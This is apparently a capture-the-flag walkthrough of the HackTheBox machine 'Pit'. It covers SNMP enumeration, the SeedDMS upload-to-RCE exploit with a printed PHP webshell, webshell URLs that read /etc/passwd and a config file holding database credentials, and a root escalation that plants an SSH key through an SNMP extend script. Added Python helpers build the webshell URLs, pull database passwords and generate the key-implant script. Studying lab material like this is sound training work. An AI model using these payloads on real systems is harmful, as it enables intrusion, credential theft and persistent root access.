# PIT

## Scanning

**NMAP**

* TCP

```
➜  ~ nmap -T4 -p- -A pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 12:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
```

*Add `dms-pit.htb` (the CN/SAN from the certificate on 9090) to the hosts file.*

* UDP

  After a while I realized there was no way in through the TCP ports, so I went for a UDP scan.

```
➜  ~ sudo nmap -T5 -sU --top-ports 4 pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.22s latency).

PORT    STATE         SERVICE
123/udp filtered      ntp
137/udp filtered      netbios-ns
161/udp open|filtered snmp
631/udp filtered      ipp

Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds
```

`161/udp open|filtered snmp` is the way in.

## Enumeration

![](/files/-Mjja_SCCUaYdBYGOmtE)

Reading the saved SNMP walk: `cat 10.10.10.241.snmp`

![](/files/-MjjadeSSWdr9ydZiUrP)

We find this directory: `/seeddms51x/seeddms`

![](/files/-MjjagmYS6KeUyRzai_2)

I tried some default credentials, but nothing worked.

Back to the SNMP dump, searching for credentials.

![](/files/-MjjakZ9TpS3JX6N-4_I)

After some tries, the credentials `michelle:michelle` work.

![](/files/-MjjamcVvfwyTHj6omYh)
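A small parser for a saved snmpwalk dump, added here as an example (it is not part of the original write-up or of any tool used on the box). It rebuilds the process table from `hrSWRunPath`/`hrSWRunParameters`, which is where command-line passwords and application paths turn up, and lists any `nsExtendCommand` entries, which are commands snmpd runs on demand and matter again for privilege escalation. The dump below is constructed; the real one is only shown above as screenshots, and every pid, path and password in it is made up.

```python
import re
from collections import defaultdict

# Constructed snmpwalk output, not the box's real dump (the write-up only
# shows that as screenshots). Paths, pids and the password are made up.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.815 = STRING: "snmpd"
HOST-RESOURCES-MIB::hrSWRunPath.815 = STRING: "/usr/sbin/snmpd"
HOST-RESOURCES-MIB::hrSWRunParameters.815 = STRING: "-LS0-6d -f"
HOST-RESOURCES-MIB::hrSWRunName.1201 = STRING: "backup.sh"
HOST-RESOURCES-MIB::hrSWRunPath.1201 = STRING: "/bin/bash"
HOST-RESOURCES-MIB::hrSWRunParameters.1201 = STRING: "/opt/backup.sh --user svc --password Example123"
HOST-RESOURCES-MIB::hrSWRunName.1350 = STRING: "nginx"
HOST-RESOURCES-MIB::hrSWRunPath.1350 = STRING: "/usr/sbin/nginx"
HOST-RESOURCES-MIB::hrSWRunParameters.1350 = STRING: "-c /etc/nginx/nginx.conf"
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/example-monitor
"""

# One snmpwalk line: MIB::object.index = TYPE: value
LINE_RE = re.compile(
    r"^(?P<mib>[\w-]+)::(?P<obj>\w+)(?P<idx>[^\s=]*) = (?P<type>[\w-]+): ?(?P<val>.*)$")

# Things worth a second look in a command line: a password-ish flag with its
# value, and absolute paths (config files, web roots, cron scripts).
CRED_RE = re.compile(r"(?i)-{0,2}(?:pass(?:word|wd)?|pwd|secret|token|api[-_]?key)[=:\s]+(\S+)")
PATH_RE = re.compile(r"/[\w./-]+")


def parse_walk(text):
    """Yield (object, index, value) for each parseable line; string values
    have their surrounding quotes removed."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            idx = m.group("idx").lstrip(".").strip('"')
            yield m.group("obj"), idx, m.group("val").strip().strip('"')


def processes(text):
    """Rebuild the process table from hrSWRun* rows, keyed by pid."""
    procs = defaultdict(dict)
    for obj, idx, val in parse_walk(text):
        if obj in ("hrSWRunName", "hrSWRunPath", "hrSWRunParameters"):
            procs[int(idx)][obj] = val
    return dict(procs)


def extend_commands(text):
    """nsExtendCommand entries: commands snmpd runs when those OIDs are read."""
    return {idx: val for obj, idx, val in parse_walk(text) if obj == "nsExtendCommand"}


def findings(text):
    """Flag credentials and paths in process arguments, plus extend scripts."""
    out = []
    for pid, p in sorted(processes(text).items()):
        args = p.get("hrSWRunParameters", "")
        out += [("credential", pid, m.group(0)) for m in CRED_RE.finditer(args)]
        out += [("path", pid, path) for path in PATH_RE.findall(args)]
    out += [("extend", name, cmd) for name, cmd in extend_commands(text).items()]
    return out


if __name__ == "__main__":
    for kind, where, what in findings(SAMPLE_WALK):
        print(f"{kind:10} {where!s:12} {what}")
```

Run it against a real dump with `python3 snmp_findings.py < 10.10.10.241.snmp` after swapping `SAMPLE_WALK` for `sys.stdin.read()`; the `extend` lines are the ones to keep in mind for later, since anything those commands execute runs with snmpd's privileges.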

## Exploit

![](/files/-MjjaqbEhqBh6pxsJaIR)

Now we know the DMS version: SeedDMS 5.1.15. The exploit-db entry below is written for versions below 5.1.11, but the upload-to-RCE path still works on this instance, as the next steps show.

![](/files/-MjjaubpUao3UtCE-HqS)

**exploit**

```
➜  ~ cat 47022.txt 
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
```

Create the backdoor (the PHP snippet from the exploit, saved as `shell.php`):

![](/files/-Mjjazf40rG3oFPmrehL)

Add it as a document in this folder: `DMS / Docs / Users / Michelle /`

![](/files/-Mjjb5-nF_QD-Y-oebfk)

Upload `shell.php` under the name `1.php` (**step 2**):

![](/files/-Mjjb8OQNj8nDapR8f6P)

**Step 3**: the document id is `documentid=30` here; check yours.

![](/files/-MjjbBwVIB5nMtOqqdMs)

**step 4**

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20/etc/passwd`

![](/files/-MjjbGCuBL3sXK1krUuA)

`/etc/shadow` is not readable from the webshell.

A reverse shell would not connect back either.

I tried **path traversal** relative to the webshell's directory to reach the DB credentials, and it works:

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20../../../conf/settings.xml`

![](/files/-MjjbQLK_2wmMrumEJYX)

Inspect this page (the browser swallows the XML tags, so use the page source)

and search for the username:

![](/files/-MjjbTSjAQ3GhifLUvFf)
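The two things going on in this step, worked through as an added example (not the author's code and not SeedDMS's): where a `../` path typed into the dropped `1.php` actually lands, and pulling the database credentials out of `settings.xml` without fighting the browser's rendering. The `settings.xml` fragment is constructed; its `<database>` element and attribute names follow SeedDMS's `conf/settings.xml` layout, but the values are made up and are not the box's credentials. The host, document id and `data/1048576` path come from the write-up above.

```python
import posixpath
import xml.etree.ElementTree as ET
from urllib.parse import urlencode, urlunsplit

# Directory the uploaded 1.php lives in, from the write-up (document id 30).
SHELL_DIR = "/seeddms51x/data/1048576/30"


def webshell_url(host, shell_dir, cmd, scheme="http"):
    """Build the ?cmd= URL for the dropped 1.php, percent-encoding the
    command (the write-up does this by hand with %20)."""
    return urlunsplit((scheme, host, f"{shell_dir}/1.php", urlencode({"cmd": cmd}), ""))


def resolve_traversal(shell_dir, relative):
    """Where a relative path typed into the webshell ends up. system() in
    the backdoor runs with the script's own directory as CWD, so each ../
    climbs one level from data/1048576/<id>: three of them reach the
    seeddms51x root, next to conf/."""
    return posixpath.normpath(posixpath.join(shell_dir, relative))


# Constructed settings.xml fragment. The <database> element and its attribute
# names follow SeedDMS's conf/settings.xml; the values are made up.
SAMPLE_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <site>
    <display siteName="Example DMS"/>
  </site>
  <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms"
            dbUser="seeddms" dbPass="ExamplePass1" doNotCheckVersion="false"/>
</configuration>
"""


def db_credentials(xml_text):
    """Pull the database connection attributes out of settings.xml. A browser
    hides the XML tags when it renders the webshell output, which is why the
    write-up reads the page source; parsing the raw text avoids that."""
    db = ET.fromstring(xml_text).find(".//database")
    if db is None:
        return None
    return {k: db.get(k) for k in ("dbDriver", "dbHostname", "dbDatabase", "dbUser", "dbPass")}


if __name__ == "__main__":
    print(webshell_url("dms-pit.htb", SHELL_DIR, "cat ../../../conf/settings.xml"))
    print(resolve_traversal(SHELL_DIR, "../../../conf/settings.xml"))
    print(db_credentials(SAMPLE_SETTINGS))
```

The `dbPass` value is the one to try against every account you have seen so far; on this box the database password turned out to be reused for `michelle` on the main app.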

Let's reuse these credentials on the main web app.

After some tries, the credentials `michelle:ied^ieY6xoquu` work.

![](/files/-MjjbW_2T5tRqVYmKXH-)

We're in 🎉

![](/files/-MjjbhhAMgN_ORckYu3Z)

and the Terminal tab gives us a shell:

![](/files/-MjjbjpGWqbQ8x7D3Qtl)

* [x] USER FLAG

## Privilege Escalation

From the SNMP enumeration we find this:

![](/files/-Mjjbovq5YuBsz0vQUKh)

![](/files/-MjjbsMlB5Jc_h6GAz3A)

We can't list this directory.

![](/files/-MjjbuNqvDKpEeHGZiFB)

Let's check the permissions on it:

![](/files/-Mjjby0dGJZXwt8aGpld)

`michelle -wx`: we can write and execute (that is, create files in the directory) but not read it, which is why listing fails.

Let's create an SSH payload with our public key and put it into the `/usr/local/monitoring` directory.

On the attacker machine, generate a key pair:

![](/files/-Mjjc-YCF-6DHGDQO6Z2)

After creating the key, place the public key in this payload and save it:

```
echo "your-public-ssh-key" > /root/.ssh/authorized_keys
```

![](/files/-Mjjc5iAFcdaCgtUavHE)

Save it as **check.sh**. Note that `>` replaces whatever is already in root's `authorized_keys`; `>>` would append instead.

Start a local web server to serve it to the target:

![](/files/-MjjcBVCBmKJCbLht8_K)

![](/files/-MjjcExOLeTv1FW7d7Jd)

```
➜  ~ snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
```

Walking `nsExtendObjects` makes snmpd run the extend command, which is what executes our script. See [this](https://www.dpstele.com/snmp/what-does-oid-network-elements.php) for background on OIDs.

![](/files/-MjjcJ-Eo86xpjVD9JMF)
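Two checks for this step, added here as an example (not the author's code): a POSIX ACL evaluator that confirms from `getfacl` output that a user with `-wx` but no `r` on a directory can still create a file in it, and a builder for `check.sh` that validates the public key and appends to `authorized_keys` instead of overwriting it. The `getfacl` text and the key are constructed; the write-up shows the real ACL only as a screenshot and reports the `michelle` entry as `-wx`.

```python
import re

# Constructed getfacl output. The write-up shows the real one only as a
# screenshot and reports the michelle entry as '-wx'.
SAMPLE_ACL = """\
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::r-x
mask::rwx
other::---
"""

# Constructed ed25519 public key (not anyone's real key).
SAMPLE_PUBKEY = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleExampleExampleExample"
                 "ExampleExa attacker@kali")


def parse_acl(text):
    """Turn getfacl output into owner, owning group and (tag, qualifier,
    permission-set) entries. Trailing '#effective:' comments are dropped."""
    acl = {"owner": None, "group": None, "entries": []}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("# owner:"):
            acl["owner"] = line.split(":", 1)[1].strip()
        elif line.startswith("# group:"):
            acl["group"] = line.split(":", 1)[1].strip()
        elif line and not line.startswith("#"):
            tag, qualifier, perms = line.split("#")[0].strip().split(":")
            acl["entries"].append((tag, qualifier, {p for p in perms if p != "-"}))
    return acl


def can_access(acl, user, wanted, groups=()):
    """POSIX ACL check order: owner, then a named user entry, then every
    matching group entry (any one that grants all of `wanted` wins), then
    other. Named user and group entries are limited by the mask."""
    entries = acl["entries"]
    mask = next((p for t, _, p in entries if t == "mask"), None)

    def masked(p):
        return p & mask if mask is not None else p

    if user == acl["owner"]:
        return wanted <= next(p for t, q, p in entries if t == "user" and q == "")
    for t, q, p in entries:
        if t == "user" and q == user:
            return wanted <= masked(p)
    group_perms = [p for t, q, p in entries if t == "group" and
                   ((q == "" and acl["group"] in groups) or (q and q in groups))]
    if group_perms:
        return any(wanted <= masked(p) for p in group_perms)
    return wanted <= next(p for t, _, p in entries if t == "other")


def can_create_file(acl, user, groups=()):
    """Creating a file in a directory needs write and search (x) on the
    directory; read is not needed, so 'ls' fails while dropping a script works."""
    return can_access(acl, user, {"w", "x"}, groups)


def is_openssh_pubkey(line):
    """Single-line OpenSSH public key: type, base64 blob, optional comment."""
    return re.fullmatch(r"(ssh-(rsa|ed25519)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+( \S+)?",
                        line.strip()) is not None


def check_sh(pubkey_line):
    """The check.sh that the extend handler ends up running as root. Unlike the
    write-up's one-liner it creates /root/.ssh if missing, appends (>>) so any
    existing root keys survive, and sets the permissions sshd insists on."""
    if not is_openssh_pubkey(pubkey_line):
        raise ValueError("not a single-line OpenSSH public key")
    key = pubkey_line.strip()
    return "\n".join([
        "#!/bin/bash",
        "mkdir -p /root/.ssh && chmod 700 /root/.ssh",
        f"echo '{key}' >> /root/.ssh/authorized_keys",
        "chmod 600 /root/.ssh/authorized_keys",
        "",
    ])


if __name__ == "__main__":
    acl = parse_acl(SAMPLE_ACL)
    print("michelle can create files:", can_create_file(acl, "michelle"))
    print(check_sh(SAMPLE_PUBKEY))
```

Run `getfacl /usr/local/monitoring` on the target, paste the output in place of `SAMPLE_ACL`, and the evaluator tells you whether the drop will succeed before you bother serving the file; `check_sh()` takes the contents of your `id_ed25519.pub` and prints the script to save as `check.sh`.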

* [x] ROOT FLAG

